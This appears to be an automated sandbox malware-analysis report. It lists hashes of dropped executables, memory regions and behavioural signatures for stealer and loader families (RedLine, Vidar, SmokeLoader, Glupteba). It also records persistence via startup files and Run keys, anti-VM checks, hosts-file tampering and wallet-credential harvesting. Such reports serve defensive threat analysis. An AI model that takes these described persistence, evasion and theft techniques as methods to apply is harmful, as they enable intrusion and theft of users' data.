| SHA512 | 1e33e34595ebb6ce129d0244199d29722c916c036da542c3001f84b10a964b96cec7a9fdd19e120d7840614b307b504be993a4f8538d54382aa4944575476dda |
memory/1608-292-0x0000000005B60000-0x0000000005B61000-memory.dmp
C:\Users\Admin\Documents\1PK75Ee7bUR5cLhxwMHcBK4D.exe
| MD5 | 592404767648b0afc3cab6fade2fb7d2 |
| SHA1 | bab615526528b498a09d76decbf86691807e7822 |
| SHA256 | 3593247c384586966e5a0e28eb4c4174b31e93c78c7a9e8fef96ec42a152e509 |
| SHA512 | 83819e4956ac6da21c4927fa6edee2b178bc89bcda8fb5f4d0767d0d8310393f50f0f7e76e1a963002626a8176abfa8d864c9229a41e5b61e1a24a32d379dda9 |
memory/2436-289-0x0000000000000000-mapping.dmp
C:\Users\Admin\Documents\f6I3pBrbcTucpuiGuN7jQPmx.exe
| MD5 | 29903569f45cc9979551427cc5d9fd99 |
| SHA1 | 0487682dd1300b26cea9275a405c8ad3383a1583 |
| SHA256 | eec05dc9ade2a7ee74ea5fb115bdd687b457d1f81841238a61e9775d6cc4bfa6 |
| SHA512 | f8f29c163bfabc90ade4981523feb943656cc20a562e5b4f6f2c6788f781408aec39114a129e765332aa0022d154d4516e9cb56bc01762b114833fddb30d23fb |
memory/4000-326-0x0000000000000000-mapping.dmp
memory/2164-325-0x0000000000000000-mapping.dmp
C:\Users\Admin\Documents\1PK75Ee7bUR5cLhxwMHcBK4D.exe
| MD5 | 592404767648b0afc3cab6fade2fb7d2 |
| SHA1 | bab615526528b498a09d76decbf86691807e7822 |
| SHA256 | 3593247c384586966e5a0e28eb4c4174b31e93c78c7a9e8fef96ec42a152e509 |
| SHA512 | 83819e4956ac6da21c4927fa6edee2b178bc89bcda8fb5f4d0767d0d8310393f50f0f7e76e1a963002626a8176abfa8d864c9229a41e5b61e1a24a32d379dda9 |
memory/5052-286-0x0000000000000000-mapping.dmp
memory/3992-287-0x0000000000000000-mapping.dmp
memory/424-283-0x0000000000000000-mapping.dmp
memory/920-284-0x0000000000EF0000-0x0000000000EF1000-memory.dmp
C:\Users\Admin\Documents\xdwePyVhF3a2vadLaZK8AsAE.exe
| MD5 | c7ccbd62c259a382501ff67408594011 |
| SHA1 | c1dca912e6c63e3730f261a3b4ba86dec0acd5f3 |
| SHA256 | 8cfa7e9bc6cbd458cec18a25e6f763a3776802490e6b3d451d864c4dba50c437 |
| SHA512 | 5f5958363820795f96fff6ad71bc1b59ec01a6a24876c5d22d48efaa49bc55373fca1f8e927c23547cdb494ba46b6d3871f377e607c97d9f10d4e0636ac7ef2b |
memory/4432-282-0x0000000000400000-0x0000000000420000-memory.dmp
memory/1992-330-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\5981299.exe
| MD5 | 724252e8cc86d50db3dd965a744188c0 |
| SHA1 | 4f96e366267aa778d2f6b11bc35e5aca518a6c30 |
| SHA256 | 786bcc1e15c4c6c7a37ac4908c5991d5589b6d04c74070c0f083287fc74782ff |
| SHA512 | 3443a8230f77555e1c101a6b9a91d6695a45ff1cc5a503cb14ba0b87cefc8a58ab7e3d96df344f2df043fd285bc235e81dae51a8c6317d9262c519f945dd7a91 |
memory/1992-339-0x0000000000B60000-0x0000000000B61000-memory.dmp
C:\Users\Admin\Documents\CnBLlchd7TCDLhvqtxGvhC0e.exe
| MD5 | 161b975933aaae18920d241890000dac |
| SHA1 | 1cbbad54762c6301ad9ad2291159b9d2a141c143 |
| SHA256 | dcdb0bc5e91652e7e3d2269581275c18d8c5eabbde14f9c17c99e5ff49e54a83 |
| SHA512 | 758d1d206c887637d0727ba380d94d4cc1bb8a37cc705dbe62435a45c4ebb0ea111c9e9238261da64dd0d8ee5e27fd9851053dffa0359670a165973dd4f91443 |
C:\Users\Admin\AppData\Roaming\5981299.exe
| MD5 | 724252e8cc86d50db3dd965a744188c0 |
| SHA1 | 4f96e366267aa778d2f6b11bc35e5aca518a6c30 |
| SHA256 | 786bcc1e15c4c6c7a37ac4908c5991d5589b6d04c74070c0f083287fc74782ff |
| SHA512 | 3443a8230f77555e1c101a6b9a91d6695a45ff1cc5a503cb14ba0b87cefc8a58ab7e3d96df344f2df043fd285bc235e81dae51a8c6317d9262c519f945dd7a91 |
memory/4832-334-0x0000000000140000-0x0000000000141000-memory.dmp
C:\Users\Admin\Documents\jWPHVWYPOdmwbHd9Sxbcg7xA.exe
| MD5 | 44c355ae8cc3ecc4a95b5716fb9635fd |
| SHA1 | f4d46438cad6fac2be4fb08cf6972a8306e5e12a |
| SHA256 | f77f16151eb30569f7f1276063f67100c6ad439fde9d07605c5ae5e0c9eb8b7d |
| SHA512 | 46ab10861ff330796bd7e60c71e474ebb7a44d2000eea9d56c4fcc27d6b1e1c643996c91d6261f107aa5b86b3bbaf38c23be4705a6fcc3a587bd9d7422c7f259 |
memory/4884-342-0x00000000052B0000-0x0000000005856000-memory.dmp
memory/4212-340-0x0000000000000000-mapping.dmp
C:\Users\Admin\Documents\xdwePyVhF3a2vadLaZK8AsAE.exe
| MD5 | c7ccbd62c259a382501ff67408594011 |
| SHA1 | c1dca912e6c63e3730f261a3b4ba86dec0acd5f3 |
| SHA256 | 8cfa7e9bc6cbd458cec18a25e6f763a3776802490e6b3d451d864c4dba50c437 |
| SHA512 | 5f5958363820795f96fff6ad71bc1b59ec01a6a24876c5d22d48efaa49bc55373fca1f8e927c23547cdb494ba46b6d3871f377e607c97d9f10d4e0636ac7ef2b |
C:\Users\Admin\AppData\Local\Temp\C411.tmp\C412.tmp\extd.exe
| MD5 | b019efc4814c7a73b1413a335be1fa13 |
| SHA1 | 6e093c94cfa4a0fe25e626875f2b06a5cbc622d2 |
| SHA256 | a13ac752c70e4bbd3cd8a58c48d41a7d80946ad2a92780ee26f47100a01e345e |
| SHA512 | d8eae2f4e64ffd4cc3e6398a0e69aa54f7cc98a461d515cb7d8d9606b65c1bb1d70ff1a1cbbb6b84291898fe5d8926b908fdf46ed22ab5d8fc52a6c60bc7120b |
memory/4432-349-0x0000000005890000-0x0000000005EA8000-memory.dmp
memory/852-359-0x0000000000000000-mapping.dmp
memory/1992-355-0x000000001B8E0000-0x000000001B8E2000-memory.dmp
memory/3728-354-0x0000000000000000-mapping.dmp
memory/920-353-0x00000000058F0000-0x00000000058F1000-memory.dmp
C:\Users\Admin\AppData\Roaming\5949319.exe
| MD5 | 3598180fddc06dbd304b76627143b01d |
| SHA1 | 1d39b0dd8425359ed94e606cb04f9c5e49ed1899 |
| SHA256 | 44a280749c51af08ff5c1aebcda01c36935f7ecb66d15f57e53c022ce0426bda |
| SHA512 | 8f77e49e2868dc9655dd5af20645799fb42940ca50f9dd0371bba9128286348ab3cbf09467f21b60d2596a0af6c755a43b92a26037b8dfae2e957602ff46ec9d |
memory/1612-369-0x0000000000000000-mapping.dmp
memory/2456-365-0x0000000003010000-0x000000000303F000-memory.dmp
memory/4368-364-0x0000000000000000-mapping.dmp
memory/2992-362-0x0000000000000000-mapping.dmp
memory/4832-373-0x0000000004D30000-0x0000000004D31000-memory.dmp
memory/1064-375-0x0000000000000000-mapping.dmp
memory/2464-377-0x0000000000000000-mapping.dmp
memory/1612-378-0x0000000000700000-0x0000000000703000-memory.dmp
memory/4112-382-0x0000000000000000-mapping.dmp
memory/256-385-0x0000000000000000-mapping.dmp
memory/2656-390-0x0000000000000000-mapping.dmp
memory/2268-398-0x0000000000000000-mapping.dmp
memory/4368-410-0x000001F9204E0000-0x000001F92054E000-memory.dmp
memory/2256-412-0x0000000000000000-mapping.dmp
memory/4368-416-0x000001F920550000-0x000001F92061F000-memory.dmp
memory/1796-420-0x0000000000000000-mapping.dmp
memory/2256-423-0x0000000000400000-0x0000000000414000-memory.dmp
memory/3992-435-0x00000000052E0000-0x00000000052E1000-memory.dmp
memory/2424-430-0x0000000000000000-mapping.dmp
memory/4452-429-0x0000000000000000-mapping.dmp
memory/2992-428-0x00000000050B0000-0x00000000050B1000-memory.dmp
memory/4912-439-0x0000000000000000-mapping.dmp
memory/3084-443-0x0000000000000000-mapping.dmp
memory/4756-437-0x0000000000000000-mapping.dmp
memory/5052-449-0x0000000003F90000-0x0000000003FC0000-memory.dmp
memory/1064-442-0x0000000004D50000-0x0000000005368000-memory.dmp
memory/2424-454-0x0000000000400000-0x0000000000414000-memory.dmp
memory/5340-453-0x0000000000000000-mapping.dmp
memory/4756-462-0x0000000000700000-0x0000000000701000-memory.dmp
memory/4792-469-0x0000000005F30000-0x0000000005F31000-memory.dmp
memory/5448-467-0x0000000000000000-mapping.dmp
memory/5340-473-0x0000000000700000-0x0000000000701000-memory.dmp
memory/3728-477-0x0000000005330000-0x0000000005331000-memory.dmp
memory/5448-481-0x0000000000400000-0x0000000000414000-memory.dmp
memory/972-484-0x0000000004020000-0x00000000040BD000-memory.dmp
memory/5848-491-0x0000000000000000-mapping.dmp
memory/5776-485-0x0000000000000000-mapping.dmp
memory/5964-497-0x0000000000000000-mapping.dmp
memory/5840-495-0x0000000000000000-mapping.dmp
memory/5988-499-0x0000000000000000-mapping.dmp
memory/6020-501-0x0000000000000000-mapping.dmp
memory/5840-510-0x0000000000700000-0x0000000000701000-memory.dmp
memory/5776-505-0x0000000000400000-0x000000000046D000-memory.dmp
memory/6116-511-0x0000000000000000-mapping.dmp
memory/5840-513-0x0000000005A50000-0x0000000005A51000-memory.dmp
memory/4756-514-0x0000000005A50000-0x0000000005A51000-memory.dmp
memory/4756-526-0x0000000005A70000-0x0000000005A71000-memory.dmp
memory/5240-521-0x00000000021A0000-0x00000000021A1000-memory.dmp
memory/4756-518-0x0000000005A60000-0x0000000005A61000-memory.dmp
memory/5352-517-0x0000000000000000-mapping.dmp
memory/6124-512-0x0000000000000000-mapping.dmp
memory/4756-528-0x0000000005A80000-0x0000000005A81000-memory.dmp
memory/4756-530-0x0000000005A90000-0x0000000005A91000-memory.dmp
memory/5848-535-0x00000000047D0000-0x00000000047D1000-memory.dmp
memory/3084-533-0x0000000005200000-0x0000000005818000-memory.dmp
Analysis: behavioral7
Detonation Overview
| Submitted | 2021-08-24 08:16 |
| Reported | 2021-08-24 08:46 |
| Platform | win11 |
| Max time kernel | 181s |
| Max time network | 1781s |
Command Line
Signatures
Glupteba
Glupteba Payload
MetaSploit
Modifies Windows Defender Real-time Protection settings
NetSupport
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\rundll32.exe | N/A |
RedLine
RedLine Payload
SmokeLoader
Suspicious use of NtCreateProcessExOtherParentProcess
Vidar
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Vidar Stealer
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\is-JJV0D.tmp\ultradumnibour.exe | N/A |
Executes dropped EXE
UPX packed file
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\2115.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\wshBWvHSW7E9Z5tpJBDL6bK9.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\BDPL6E6_jeDoIFJmNx5sQMo9.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\2115.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\R4xZX1luwUPq9VfxwZ2Y3Xlg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\9EVme0l7Ztgc0PCMbsYEDYAC.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\9EVme0l7Ztgc0PCMbsYEDYAC.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\P54TayrSRCWbbcdY6GCag4b7.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\sV1Jn1lT16wMLBIKSnWq35QV.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\6eJYmeT9l2nkBLhdXpHIu5jX.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\wshBWvHSW7E9Z5tpJBDL6bK9.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\YoUqTbAnGXDdz5IYILTVMbIP.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\YoUqTbAnGXDdz5IYILTVMbIP.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\sV1Jn1lT16wMLBIKSnWq35QV.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\BDPL6E6_jeDoIFJmNx5sQMo9.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\P54TayrSRCWbbcdY6GCag4b7.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\6eJYmeT9l2nkBLhdXpHIu5jX.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\R4xZX1luwUPq9VfxwZ2Y3Xlg.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fastsystem2021.exe | C:\Program Files (x86)\Company\NewProduct\customer3.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fastsystem2021.exe | C:\Program Files (x86)\Company\NewProduct\customer3.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
Themida packer
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" | C:\Windows\SysWOW64\WerFault.exe | N/A |
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\P54TayrSRCWbbcdY6GCag4b7.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\wshBWvHSW7E9Z5tpJBDL6bK9.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\6eJYmeT9l2nkBLhdXpHIu5jX.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\9EVme0l7Ztgc0PCMbsYEDYAC.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\2115.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\YoUqTbAnGXDdz5IYILTVMbIP.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\sV1Jn1lT16wMLBIKSnWq35QV.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\R4xZX1luwUPq9VfxwZ2Y3Xlg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\BDPL6E6_jeDoIFJmNx5sQMo9.exe | N/A |
Enumerates connected drives
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | api.db-ip.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | api.db-ip.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 876 set thread context of 444 | N/A | C:\Users\Admin\Documents\WDTkVNhFhmcoEMERJYQBQl7Q.exe | C:\Users\Admin\Documents\WDTkVNhFhmcoEMERJYQBQl7Q.exe |
| PID 3084 set thread context of 3708 | N/A | C:\Users\Admin\Documents\AhJPwrJS8kuvRpnEJKnRhIHz.exe | C:\Users\Admin\Documents\AhJPwrJS8kuvRpnEJKnRhIHz.exe |
| PID 4508 set thread context of 1120 | N/A | C:\Users\Admin\Documents\nV85MKdCM6UbmW1CLFfhV2SD.exe | C:\Users\Admin\Documents\nV85MKdCM6UbmW1CLFfhV2SD.exe |
| PID 3860 set thread context of 6180 | N/A | C:\Users\Admin\Documents\KuXpHUaLbM1TdWQ5WTxiUJ9E.exe | C:\Users\Admin\Documents\KuXpHUaLbM1TdWQ5WTxiUJ9E.exe |
| PID 7516 set thread context of 7748 | N/A | C:\Users\Admin\Documents\mOwx1UOkucJxsBjOd3SFb_rP.exe | C:\Users\Admin\Documents\mOwx1UOkucJxsBjOd3SFb_rP.exe |
| PID 6752 set thread context of 8160 | N/A | C:\Users\Admin\Documents\b_pTz2xC6r5VAg3un6goqCSz.exe | C:\Users\Admin\Documents\b_pTz2xC6r5VAg3un6goqCSz.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files (x86)\MaskVPN\libMaskVPN.dll | C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\ssleay32.dll | C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-VQT8M.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-77HJ3.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-0L1J3.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\winxp64\is-IP6RR.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp | N/A |
| File created | C:\Program Files\Common Files\MLZGUBILYF\ultramediaburner.exe | C:\Users\Admin\AppData\Local\Temp\is-JJV0D.tmp\ultradumnibour.exe | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\ipseccmd.exe | C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\win732\is-QME82.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\Sofware IN LLC\is-CF1IM.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q18BB.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe | C:\Users\Admin\Documents\9tgLoG72Gq9TsKPb2rKWvimJ.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe | C:\Users\Admin\AppData\Local\Temp\is-QD05A.tmp\Setup.exe | N/A |
| File created | C:\Program Files (x86)\GameBox INC\GameBox\Uninstall.ini | C:\Users\Admin\AppData\Local\Temp\is-QD05A.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\libeay32.dll | C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\mask_svc.exe | C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\driver\win732\tapinstall.exe | C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-KADTJ.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Sofware IN LLC\libcueify.dll | C:\Users\Admin\AppData\Local\Temp\is-Q18BB.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe | C:\Users\Admin\AppData\Local\Temp\is-QD05A.tmp\Setup.exe | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-ABNG0.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-60LAC.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\winxp64\is-TJ98K.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\winxp64\is-TS1DF.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Sofware IN LLC\libass.dll | C:\Users\Admin\AppData\Local\Temp\is-Q18BB.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Sofware IN LLC\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-Q18BB.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-KI3PR.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe | C:\Users\Admin\AppData\Local\Temp\is-QD05A.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\libCommon.dll | C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-7OB77.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-R973U.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-6S643.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\win732\is-ARCA4.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\winxp64\is-E2P77.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe | C:\Users\Admin\AppData\Local\Temp\is-QD05A.tmp\Setup.exe | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-6VPP5.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\winxp32\is-VIEGL.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\Sofware IN LLC\is-U9J1A.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q18BB.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Company\NewProduct\customer3.exe | C:\Users\Admin\Documents\9tgLoG72Gq9TsKPb2rKWvimJ.exe | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\tunnle.exe | C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe | C:\Users\Admin\AppData\Local\Temp\is-QD05A.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\polstore.dll | C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\win732\is-6AIQM.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Sofware IN LLC\QtProfiler.exe | C:\Users\Admin\AppData\Local\Temp\is-Q18BB.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe | C:\Users\Admin\AppData\Local\Temp\is-QD05A.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe | C:\Users\Admin\AppData\Local\Temp\is-QD05A.tmp\Setup.exe | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-OFTF0.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\win764\is-H3VBI.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\win764\is-O98DU.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Company\NewProduct\jooyu.exe | C:\Users\Admin\Documents\uRay4026UiM7xMPbYxI6iz8R.exe | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\driver\winxp64\devcon.exe | C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-29RPF.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-J9664.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\win732\is-HNPTC.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\winxp32\is-6P63M.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\MaskVPN.exe | C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe | C:\Users\Admin\AppData\Local\Temp\is-QD05A.tmp\Setup.exe | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-S32AN.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp | N/A |
